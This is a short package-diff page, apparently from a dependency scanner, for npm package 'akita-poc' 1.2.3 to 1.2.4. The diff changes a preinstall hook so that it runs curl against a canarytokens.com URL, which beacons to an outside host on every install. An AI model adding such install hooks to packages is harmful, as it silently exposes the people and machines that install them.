akita-poc 1.2.3 → 1.2.4
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +3 -3
package/package.json
CHANGED
@@ -1,16 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "akita-poc",
|
3
|
-
"version": "1.2.
|
3
|
+
"version": "1.2.4",
|
4
4
|
"description": "poc",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"preinstall": "curl
|
8
|
+
"preinstall": "curl http://canarytokens.com/static/vku44mbctn82d4rl7is2qznz5/submit.aspx"
|
9
9
|
},
|
10
10
|
"author": "Akita",
|
11
11
|
"license": "ISC",
|
12
12
|
"dependencies": {
|
13
13
|
"account": "^1.0.0",
|
14
|
-
"akita-poc": "^1.2.
|
14
|
+
"akita-poc": "^1.2.3"
|
15
15
|
}
|
16
16
|
}
|